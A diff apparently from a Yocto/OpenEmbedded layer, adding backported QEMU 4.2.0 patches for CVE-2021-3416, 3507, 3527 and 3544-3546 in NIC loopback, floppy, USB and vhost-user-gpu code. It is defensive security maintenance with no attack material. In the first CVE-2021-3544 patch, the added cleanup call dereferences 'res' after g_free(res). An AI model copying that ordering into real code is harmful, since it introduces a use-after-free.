+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+Index: qemu-4.2.0/hw/net/sungem.c
+===================================================================
+--- qemu-4.2.0.orig/hw/net/sungem.c
++++ qemu-4.2.0/hw/net/sungem.c
+@@ -305,7 +305,7 @@ static void sungem_send_packet(SunGEMSta
+     NetClientState *nc = qemu_get_queue(s->nic);
+ 
+     if (s->macregs[MAC_XIFCFG >> 2] & MAC_XIFCFG_LBCK) {
+-        nc->info->receive(nc, buf, size);
++        qemu_receive_packet(nc, buf, size);
+     } else {
+         qemu_send_packet(nc, buf, size);
+     }
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_6.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_6.patch
new file mode 100644
index 0000000000..40b4bd96e7
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_6.patch
@@ -0,0 +1,40 @@
+From c0010f9b2bafe866fe32e3c2688454bc24147136 Mon Sep 17 00:00:00 2001
+From: Jason Wang <jasowang@redhat.com>
+Date: Wed, 24 Feb 2021 13:27:52 +0800
+Subject: [PATCH 06/10] tx_pkt: switch to use qemu_receive_packet_iov() for
+ loopback
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This patch switches to use qemu_receive_receive_iov() which can detect
+reentrancy and return early.
+
+This is intended to address CVE-2021-3416.
+
+Cc: Prasad J Pandit <ppandit@redhat.com>
+Cc: qemu-stable@nongnu.org
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upstream-Status: Backport [8c552542b81e56ff532dd27ec6e5328954bdda73]
+CVE: CVE-2021-3416
+
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/net/net_tx_pkt.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+Index: qemu-4.2.0/hw/net/net_tx_pkt.c
+===================================================================
+--- qemu-4.2.0.orig/hw/net/net_tx_pkt.c
++++ qemu-4.2.0/hw/net/net_tx_pkt.c
+@@ -544,7 +544,7 @@ static inline void net_tx_pkt_sendv(stru
+     NetClientState *nc, const struct iovec *iov, int iov_cnt)
+ {
+     if (pkt->is_loopback) {
+-        nc->info->receive_iov(nc, iov, iov_cnt);
++        qemu_receive_packet_iov(nc, iov, iov_cnt);
+     } else {
+         qemu_sendv_packet(nc, iov, iov_cnt);
+     }
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_7.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_7.patch
new file mode 100644
index 0000000000..b3b702cca4
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_7.patch
@@ -0,0 +1,42 @@
+From 64b38675c728354e4015e4bec3d975cd4cb8a981 Mon Sep 17 00:00:00 2001
+From: Alexander Bulekov <alxndr@bu.edu>
+Date: Fri, 26 Feb 2021 13:47:53 -0500
+Subject: [PATCH 07/10] rtl8139: switch to use qemu_receive_packet() for
+ loopback
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This patch switches to use qemu_receive_packet() which can detect
+reentrancy and return early.
+
+This is intended to address CVE-2021-3416.
+
+Cc: Prasad J Pandit <ppandit@redhat.com>
+Cc: qemu-stable@nongnu.org
+Buglink: https://bugs.launchpad.net/qemu/+bug/1910826
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com
+Signed-off-by: Alexander Bulekov <alxndr@bu.edu>
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upstream-Status: Backport [5311fb805a4403bba024e83886fa0e7572265de4]
+CVE: CVE-2021-3416
+
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/net/rtl8139.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+Index: qemu-4.2.0/hw/net/rtl8139.c
+===================================================================
+--- qemu-4.2.0.orig/hw/net/rtl8139.c
++++ qemu-4.2.0/hw/net/rtl8139.c
+@@ -1793,7 +1793,7 @@ static void rtl8139_transfer_frame(RTL81
+         }
+ 
+         DPRINTF("+++ transmit loopback mode\n");
+-        rtl8139_do_receive(qemu_get_queue(s->nic), buf, size, do_interrupt);
++        qemu_receive_packet(qemu_get_queue(s->nic), buf, size);
+ 
+         if (iov) {
+             g_free(buf2);
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_8.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_8.patch
new file mode 100644
index 0000000000..ed716468dc
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_8.patch
@@ -0,0 +1,44 @@
+From 023ce62f0a788ad3a8233c7a828554bceeafd031 Mon Sep 17 00:00:00 2001
+From: Alexander Bulekov <alxndr@bu.edu>
+Date: Mon, 1 Mar 2021 10:33:34 -0500
+Subject: [PATCH 08/10] pcnet: switch to use qemu_receive_packet() for loopback
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This patch switches to use qemu_receive_packet() which can detect
+reentrancy and return early.
+
+This is intended to address CVE-2021-3416.
+
+Cc: Prasad J Pandit <ppandit@redhat.com>
+Cc: qemu-stable@nongnu.org
+Buglink: https://bugs.launchpad.net/qemu/+bug/1917085
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com
+Signed-off-by: Alexander Bulekov <alxndr@bu.edu>
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upstream-Status: Backport [99ccfaa1edafd79f7a3a0ff7b58ae4da7c514928]
+CVE: CVE-2021-3416
+
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/net/pcnet.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/hw/net/pcnet.c b/hw/net/pcnet.c
+index f3f18d859..dcd3fc494 100644
+--- a/hw/net/pcnet.c
++++ b/hw/net/pcnet.c
+@@ -1250,7 +1250,7 @@ txagain:
+             if (BCR_SWSTYLE(s) == 1)
+                 add_crc = !GET_FIELD(tmd.status, TMDS, NOFCS);
+             s->looptest = add_crc ? PCNET_LOOPTEST_CRC : PCNET_LOOPTEST_NOCRC;
+-            pcnet_receive(qemu_get_queue(s->nic), s->buffer, s->xmit_pos);
++            qemu_receive_packet(qemu_get_queue(s->nic), s->buffer, s->xmit_pos);
+             s->looptest = 0;
+         } else {
+             if (s->nic) {
+-- 
+2.29.2
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_9.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_9.patch
new file mode 100644
index 0000000000..f4a985604e
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_9.patch
@@ -0,0 +1,41 @@
+From ecf7e62bb2cb02c9bd40082504ae376f3e19ffd2 Mon Sep 17 00:00:00 2001
+From: Alexander Bulekov <alxndr@bu.edu>
+Date: Mon, 1 Mar 2021 14:33:43 -0500
+Subject: [PATCH 09/10] cadence_gem: switch to use qemu_receive_packet() for
+ loopback
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This patch switches to use qemu_receive_packet() which can detect
+reentrancy and return early.
+
+This is intended to address CVE-2021-3416.
+
+Cc: Prasad J Pandit <ppandit@redhat.com>
+Cc: qemu-stable@nongnu.org
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Signed-off-by: Alexander Bulekov <alxndr@bu.edu>
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upstream-Status: Backport [e73adfbeec9d4e008630c814759052ed945c3fed]
+CVE: CVE-2021-3416
+
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/net/cadence_gem.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+Index: qemu-4.2.0/hw/net/cadence_gem.c
+===================================================================
+--- qemu-4.2.0.orig/hw/net/cadence_gem.c
++++ qemu-4.2.0/hw/net/cadence_gem.c
+@@ -1225,7 +1225,7 @@ static void gem_transmit(CadenceGEMState
+                 /* Send the packet somewhere */
+                 if (s->phy_loop || (s->regs[GEM_NWCTRL] &
+                                     GEM_NWCTRL_LOCALLOOP)) {
+-                    gem_receive(qemu_get_queue(s->nic), tx_packet,
++                    qemu_receive_packet(qemu_get_queue(s->nic), tx_packet,
+                                 total_bytes);
+                 } else {
+                     qemu_send_packet(qemu_get_queue(s->nic), tx_packet,
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3507.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3507.patch
new file mode 100644
index 0000000000..4ff3413f8e
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3507.patch
@@ -0,0 +1,87 @@
+From defac5e2fbddf8423a354ff0454283a2115e1367 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Philippe=20Mathieu-Daud=C3=A9?= <philmd@redhat.com>
+Date: Thu, 18 Nov 2021 12:57:32 +0100
+Subject: [PATCH] hw/block/fdc: Prevent end-of-track overrun (CVE-2021-3507)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Per the 82078 datasheet, if the end-of-track (EOT byte in
+the FIFO) is more than the number of sectors per side, the
+command is terminated unsuccessfully:
+
+* 5.2.5 DATA TRANSFER TERMINATION
+
+  The 82078 supports terminal count explicitly through
+  the TC pin and implicitly through the underrun/over-
+  run and end-of-track (EOT) functions. For full sector
+  transfers, the EOT parameter can define the last
+  sector to be transferred in a single or multisector
+  transfer. If the last sector to be transferred is a par-
+  tial sector, the host can stop transferring the data in
+  mid-sector, and the 82078 will continue to complete
+  the sector as if a hardware TC was received. The
+  only difference between these implicit functions and
+  TC is that they return "abnormal termination" result
+  status. Such status indications can be ignored if they
+  were expected.
+
+* 6.1.3 READ TRACK
+
+  This command terminates when the EOT specified
+  number of sectors have been read. If the 82078
+  does not find an I D Address Mark on the diskette
+  after the second· occurrence of a pulse on the
+  INDX# pin, then it sets the IC code in Status Regis-
+  ter 0 to "01" (Abnormal termination), sets the MA bit
+  in Status Register 1 to "1", and terminates the com-
+  mand.
+
+* 6.1.6 VERIFY
+
+  Refer to Table 6-6 and Table 6-7 for information
+  concerning the values of MT and EC versus SC and
+  EOT value.
+
+* Table 6·6. Result Phase Table
+
+* Table 6-7. Verify Command Result Phase Table
+
+Fix by aborting the transfer when EOT > # Sectors Per Side.
+
+Cc: qemu-stable@nongnu.org
+Cc: Hervé Poussineau <hpoussin@reactos.org>
+Fixes: baca51faff0 ("floppy driver: disk geometry auto detect")
+Reported-by: Alexander Bulekov <alxndr@bu.edu>
+Resolves: https://gitlab.com/qemu-project/qemu/-/issues/339
+Signed-off-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Message-Id: <20211118115733.4038610-2-philmd@redhat.com>
+Reviewed-by: Hanna Reitz <hreitz@redhat.com>
+Signed-off-by: Kevin Wolf <kwolf@redhat.com>
+
+Upstream-Status: Backport [https://github.com/qemu/qemu/commit/defac5e2fbddf8423a354ff0454283a2115e1367]
+CVE: CVE-2021-3507
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ hw/block/fdc.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+diff --git a/hw/block/fdc.c b/hw/block/fdc.c
+index 347875a0cdae..57bb355794a9 100644
+--- a/hw/block/fdc.c
++++ b/hw/block/fdc.c
+@@ -1530,6 +1530,14 @@ static void fdctrl_start_transfer(FDCtrl *fdctrl, int direction)
+         int tmp;
+         fdctrl->data_len = 128 << (fdctrl->fifo[5] > 7 ? 7 : fdctrl->fifo[5]);
+         tmp = (fdctrl->fifo[6] - ks + 1);
++        if (tmp < 0) {
++            FLOPPY_DPRINTF("invalid EOT: %d\n", tmp);
++            fdctrl_stop_transfer(fdctrl, FD_SR0_ABNTERM, FD_SR1_MA, 0x00);
++            fdctrl->fifo[3] = kt;
++            fdctrl->fifo[4] = kh;
++            fdctrl->fifo[5] = ks;
++            return;
++        }
+         if (fdctrl->fifo[0] & 0x80)
+             tmp += fdctrl->fifo[6];
+         fdctrl->data_len *= tmp;
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-1.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-1.patch
new file mode 100644
index 0000000000..77a5385692
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-1.patch
@@ -0,0 +1,42 @@
+From 05a40b172e4d691371534828078be47e7fff524c Mon Sep 17 00:00:00 2001
+From: Gerd Hoffmann <kraxel@redhat.com>
+Date: Mon, 3 May 2021 15:29:15 +0200
+Subject: [PATCH] usb: limit combined packets to 1 MiB (CVE-2021-3527)
+
+usb-host and usb-redirect try to batch bulk transfers by combining many
+small usb packets into a single, large transfer request, to reduce the
+overhead and improve performance.
+
+This patch adds a size limit of 1 MiB for those combined packets to
+restrict the host resources the guest can bind that way.
+
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+Message-Id: <20210503132915.2335822-6-kraxel@redhat.com>
+
+Upstream-Status: Backport
+https://gitlab.com/qemu-project/qemu/-/commit/05a40b172e4d691371534828078be47e7fff524c
+CVE: CVE-2021-3527
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ hw/usb/combined-packet.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/hw/usb/combined-packet.c b/hw/usb/combined-packet.c
+index 5d57e883dc..e56802f89a 100644
+--- a/hw/usb/combined-packet.c
++++ b/hw/usb/combined-packet.c
+@@ -171,7 +171,9 @@ void usb_ep_combine_input_packets(USBEndpoint *ep)
+         if ((p->iov.size % ep->max_packet_size) != 0 || !p->short_not_ok ||
+                 next == NULL ||
+                 /* Work around for Linux usbfs bulk splitting + migration */
+-                (totalsize == (16 * KiB - 36) && p->int_req)) {
++                (totalsize == (16 * KiB - 36) && p->int_req) ||
++                /* Next package may grow combined package over 1MiB */
++                totalsize > 1 * MiB - ep->max_packet_size) {
+             usb_device_handle_data(ep->dev, first);
+             assert(first->status == USB_RET_ASYNC);
+             if (first->combined) {
+-- 
+GitLab
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-2.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-2.patch
new file mode 100644
index 0000000000..6371aced12
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3527-2.patch
@@ -0,0 +1,59 @@
+From 7ec54f9eb62b5d177e30eb8b1cad795a5f8d8986 Mon Sep 17 00:00:00 2001
+From: Gerd Hoffmann <kraxel@redhat.com>
+Date: Mon, 3 May 2021 15:29:12 +0200
+Subject: [PATCH] usb/redir: avoid dynamic stack allocation (CVE-2021-3527)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Use autofree heap allocation instead.
+
+Fixes: 4f4321c11ff ("usb: use iovecs in USBPacket")
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+Tested-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Message-Id: <20210503132915.2335822-3-kraxel@redhat.com>
+
+Upstream-Status: Backport
+https://gitlab.com/qemu-project/qemu/-/commit/7ec54f9eb62b5d177e30eb8b1cad795a5f8d8986
+CVE: CVE-2021-3527
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ hw/usb/redirect.c | 6 +++---
+ 1 file changed, 3 insertions(+), 3 deletions(-)
+
+diff --git a/hw/usb/redirect.c b/hw/usb/redirect.c
+index 17f06f3417..6a75b0dc4a 100644
+--- a/hw/usb/redirect.c
++++ b/hw/usb/redirect.c
+@@ -620,7 +620,7 @@ static void usbredir_handle_iso_data(USBRedirDevice *dev, USBPacket *p,
+                 .endpoint = ep,
+                 .length = p->iov.size
+             };
+-            uint8_t buf[p->iov.size];
++            g_autofree uint8_t *buf = g_malloc(p->iov.size);
+             /* No id, we look at the ep when receiving a status back */
+             usb_packet_copy(p, buf, p->iov.size);
+             usbredirparser_send_iso_packet(dev->parser, 0, &iso_packet,
+@@ -818,7 +818,7 @@ static void usbredir_handle_bulk_data(USBRedirDevice *dev, USBPacket *p,
+         usbredirparser_send_bulk_packet(dev->parser, p->id,
+                                         &bulk_packet, NULL, 0);
+     } else {
+-        uint8_t buf[size];
++        g_autofree uint8_t *buf = g_malloc(size);
+         usb_packet_copy(p, buf, size);
+         usbredir_log_data(dev, "bulk data out:", buf, size);
+         usbredirparser_send_bulk_packet(dev->parser, p->id,
+@@ -923,7 +923,7 @@ static void usbredir_handle_interrupt_out_data(USBRedirDevice *dev,
+                                                USBPacket *p, uint8_t ep)
+ {
+     struct usb_redir_interrupt_packet_header interrupt_packet;
+-    uint8_t buf[p->iov.size];
++    g_autofree uint8_t *buf = g_malloc(p->iov.size);
+ 
+     DPRINTF("interrupt-out ep %02X len %zd id %"PRIu64"\n", ep,
+             p->iov.size, p->id);
+-- 
+GitLab
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3544.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3544.patch
new file mode 100644
index 0000000000..1b4fcbfb60
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3544.patch
@@ -0,0 +1,29 @@
+vhost-user-gpu: fix resource leak in 'vg_resource_create_2d' (CVE-2021-3544)
+
+Call 'vugbm_buffer_destroy' in error path to avoid resource leak.
+
+Fixes: CVE-2021-3544
+Reported-by: default avatarLi Qiang <liq3ea@163.com>
+Reviewed-by: default avatarPrasad J Pandit <pjp@fedoraproject.org>
+Signed-off-by: default avatarLi Qiang <liq3ea@163.com>
+Reviewed-by: Marc-André Lureau's avatarMarc-André Lureau <marcandre.lureau@redhat.com>
+Message-Id: <20210516030403.107723-3-liq3ea@163.com>
+Signed-off-by: Gerd Hoffmann's avatarGerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+[vhost-user-gpu does not exist in 4.2.0]
+CVE: CVE-2021-3544
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+Index: qemu-4.2.0/contrib/vhost-user-gpu/main.c
+===================================================================
+--- qemu-4.2.0.orig/contrib/vhost-user-gpu/main.c
++++ qemu-4.2.0/contrib/vhost-user-gpu/main.c
+@@ -328,6 +328,7 @@ vg_resource_create_2d(VuGpu *g,
+         g_critical("%s: resource creation failed %d %d %d",
+                    __func__, c2d.resource_id, c2d.width, c2d.height);
+         g_free(res);
++        vugbm_buffer_destroy(&res->buffer);
+         cmd->error = VIRTIO_GPU_RESP_ERR_OUT_OF_MEMORY;
+         return;
+     }
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_2.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_2.patch
new file mode 100644
index 0000000000..36cbb127f8
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_2.patch
@@ -0,0 +1,39 @@
+vhost-user-gpu: fix memory leak in vg_resource_attach_backing (CVE-2021-3544)
+
+
+Check whether the 'res' has already been attach_backing to avoid
+memory leak.
+
+Fixes: CVE-2021-3544
+Reported-by: default avatarLi Qiang <liq3ea@163.com>
+virtio-gpu fix: 204f01b3
+
+ ("virtio-gpu: fix memory leak
+ in resource attach backing")
+ Signed-off-by: default avatarLi Qiang <liq3ea@163.com>
+ Reviewed-by: Marc-André Lureau's avatarMarc-André Lureau <marcandre.lureau@redhat.com>
+ Message-Id: <20210516030403.107723-4-liq3ea@163.com>
+ Signed-off-by: Gerd Hoffmann's avatarGerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+[vhost-user-gpu does not exist in 4.2.0 context]
+CVE: CVE-2021-3544
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+
+Index: qemu-4.2.0/contrib/vhost-user-gpu/main.c
+===================================================================
+--- qemu-4.2.0.orig/contrib/vhost-user-gpu/main.c
++++ qemu-4.2.0/contrib/vhost-user-gpu/main.c
+@@ -468,6 +468,11 @@ vg_resource_attach_backing(VuGpu *g,
+         return;
+     }
+ 
++    if (res->iov) {
++        cmd->error = VIRTIO_GPU_RESP_ERR_UNSPEC;
++        return;
++    }
++
+     ret = vg_create_mapping_iov(g, &ab, cmd, &res->iov);
+     if (ret != 0) {
+         cmd->error = VIRTIO_GPU_RESP_ERR_UNSPEC;
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_3.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_3.patch
new file mode 100644
index 0000000000..c534f4c24f
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_3.patch
@@ -0,0 +1,39 @@
+vhost-user-gpu: fix memory leak while calling 'vg_resource_unref' (CVE-2021-3544)
+
+If the guest trigger following sequences, the attach_backing will be leaked:
+
+vg_resource_create_2d
+vg_resource_attach_backing
+vg_resource_unref
+
+This patch fix this by freeing 'res->iov' in vg_resource_destroy.
+
+Fixes: CVE-2021-3544
+Reported-by: default avatarLi Qiang <liq3ea@163.com>
+virtio-gpu fix: 5e8e3c4c
+
+("virtio-gpu: fix resource leak
+in virgl_cmd_resource_unref")
+Reviewed-by: default avatarPrasad J Pandit <pjp@fedoraproject.org>
+Signed-off-by: default avatarLi Qiang <liq3ea@163.com>
+Reviewed-by: Marc-André Lureau's avatarMarc-André Lureau <marcandre.lureau@redhat.com>
+Message-Id: <20210516030403.107723-5-liq3ea@163.com>
+Signed-off-by: Gerd Hoffmann's avatarGerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2021-3544
+[vhost-user-gpu does not exist in the 4.2.0]
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+Index: qemu-4.2.0/contrib/vhost-user-gpu/main.c
+===================================================================
+--- qemu-4.2.0.orig/contrib/vhost-user-gpu/main.c
++++ qemu-4.2.0/contrib/vhost-user-gpu/main.c
+@@ -379,6 +379,7 @@ vg_resource_destroy(VuGpu *g,
+     }
+ 
+     vugbm_buffer_destroy(&res->buffer);
++    g_free(res->iov);
+     pixman_image_unref(res->image);
+     QTAILQ_REMOVE(&g->reslist, res, next);
+     g_free(res);
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_4.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_4.patch
new file mode 100644
index 0000000000..96e36eb854
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_4.patch
@@ -0,0 +1,46 @@
+vhost-user-gpu: fix memory leak in 'virgl_cmd_resource_unref' (CVE-2021-3544)
+
+The 'res->iov' will be leaked if the guest trigger following sequences:
+
+virgl_cmd_create_resource_2d
+virgl_resource_attach_backing
+virgl_cmd_resource_unref
+
+This patch fixes this.
+
+Fixes: CVE-2021-3544
+Reported-by: default avatarLi Qiang <liq3ea@163.com>
+virtio-gpu fix: 5e8e3c4c
+
+("virtio-gpu: fix resource leak
+in virgl_cmd_resource_unref"
+Signed-off-by: default avatarLi Qiang <liq3ea@163.com>
+Reviewed-by: Marc-André Lureau's avatarMarc-André Lureau <marcandre.lureau@redhat.com>
+Message-Id: <20210516030403.107723-6-liq3ea@163.com>
+Signed-off-by: Gerd Hoffmann's avatarGerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2021-3544
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+Index: qemu-4.2.0/contrib/vhost-user-gpu/virgl.c
+===================================================================
+--- qemu-4.2.0.orig/contrib/vhost-user-gpu/virgl.c
++++ qemu-4.2.0/contrib/vhost-user-gpu/virgl.c
+@@ -105,9 +105,16 @@ virgl_cmd_resource_unref(VuGpu *g,
+                          struct virtio_gpu_ctrl_command *cmd)
+ {
+     struct virtio_gpu_resource_unref unref;
++    struct iovec *res_iovs = NULL;
++    int num_iovs = 0;
+ 
+     VUGPU_FILL_CMD(unref);
+ 
++    virgl_renderer_resource_detach_iov(unref.resource_id,
++            &res_iovs,
++            &num_iovs);
++    g_free(res_iovs);
++
+     virgl_renderer_resource_unref(unref.resource_id);
+ }
+ 
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_5.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_5.patch
new file mode 100644
index 0000000000..e592ce50e2
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_5.patch
@@ -0,0 +1,47 @@
+From 63736af5a6571d9def93769431e0d7e38c6677bf Mon Sep 17 00:00:00 2001
+From: Li Qiang <liq3ea@163.com>
+Date: Sat, 15 May 2021 20:04:01 -0700
+Subject: [PATCH] vhost-user-gpu: fix memory leak in
+ 'virgl_resource_attach_backing' (CVE-2021-3544)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+If 'virgl_renderer_resource_attach_iov' failed, the 'res_iovs' will
+be leaked.
+
+Fixes: CVE-2021-3544
+Reported-by: Li Qiang <liq3ea@163.com>
+virtio-gpu fix: 33243031da ("virtio-gpu-3d: fix memory leak
+in resource attach backing")
+
+Signed-off-by: Li Qiang <liq3ea@163.com>
+Reviewed-by: Marc-André Lureau <marcandre.lureau@redhat.com>
+Message-Id: <20210516030403.107723-7-liq3ea@163.com>
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2021-3544
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ contrib/vhost-user-gpu/virgl.c | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+Index: qemu-4.2.0/contrib/vhost-user-gpu/virgl.c
+===================================================================
+--- qemu-4.2.0.orig/contrib/vhost-user-gpu/virgl.c
++++ qemu-4.2.0/contrib/vhost-user-gpu/virgl.c
+@@ -283,8 +283,11 @@ virgl_resource_attach_backing(VuGpu *g,
+         return;
+     }
+ 
+-    virgl_renderer_resource_attach_iov(att_rb.resource_id,
++    ret = virgl_renderer_resource_attach_iov(att_rb.resource_id,
+                                        res_iovs, att_rb.nr_entries);
++    if (ret != 0) {
++        g_free(res_iovs);
++    }
+ }
+ 
+ static void
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3545.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3545.patch
new file mode 100644
index 0000000000..fcdda64437
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3545.patch
@@ -0,0 +1,41 @@
+From 121841b25d72d13f8cad554363138c360f1250ea Mon Sep 17 00:00:00 2001
+From: Li Qiang <liq3ea@163.com>
+Date: Sat, 15 May 2021 20:03:56 -0700
+Subject: [PATCH] vhost-user-gpu: fix memory disclosure in
+ virgl_cmd_get_capset_info (CVE-2021-3545)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Otherwise some of the 'resp' will be leaked to guest.
+
+Fixes: CVE-2021-3545
+Reported-by: Li Qiang <liq3ea@163.com>
+virtio-gpu fix: 42a8dadc74 ("virtio-gpu: fix information leak
+in getting capset info dispatch")
+
+Signed-off-by: Li Qiang <liq3ea@163.com>
+Reviewed-by: Marc-André Lureau <marcandre.lureau@redhat.com>
+Message-Id: <20210516030403.107723-2-liq3ea@163.com>
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2021-3545
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ contrib/vhost-user-gpu/virgl.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+Index: qemu-4.2.0/contrib/vhost-user-gpu/virgl.c
+===================================================================
+--- qemu-4.2.0.orig/contrib/vhost-user-gpu/virgl.c
++++ qemu-4.2.0/contrib/vhost-user-gpu/virgl.c
+@@ -132,6 +132,7 @@ virgl_cmd_get_capset_info(VuGpu *g,
+ 
+     VUGPU_FILL_CMD(info);
+ 
++    memset(&resp, 0, sizeof(resp));
+     if (info.capset_index == 0) {
+         resp.capset_id = VIRTIO_GPU_CAPSET_VIRGL;
+         virgl_renderer_get_cap_set(resp.capset_id,
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3546.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3546.patch
new file mode 100644
index 0000000000..f8da428233
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3546.patch
@@ -0,0 +1,47 @@
+From 9f22893adcb02580aee5968f32baa2cd109b3ec2 Mon Sep 17 00:00:00 2001
+From: Li Qiang <liq3ea@163.com>
+Date: Sat, 15 May 2021 20:04:02 -0700
+Subject: [PATCH] vhost-user-gpu: fix OOB write in 'virgl_cmd_get_capset'
+ (CVE-2021-3546)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+If 'virgl_cmd_get_capset' set 'max_size' to 0,
+the 'virgl_renderer_fill_caps' will write the data after the 'resp'.
+This patch avoid this by checking the returned 'max_size'.
+
+virtio-gpu fix: abd7f08b23 ("display: virtio-gpu-3d: check
+virgl capabilities max_size")
+
+Fixes: CVE-2021-3546
+Reported-by: Li Qiang <liq3ea@163.com>
+Reviewed-by: Prasad J Pandit <pjp@fedoraproject.org>
+Signed-off-by: Li Qiang <liq3ea@163.com>
+Reviewed-by: Marc-André Lureau <marcandre.lureau@redhat.com>
+Message-Id: <20210516030403.107723-8-liq3ea@163.com>
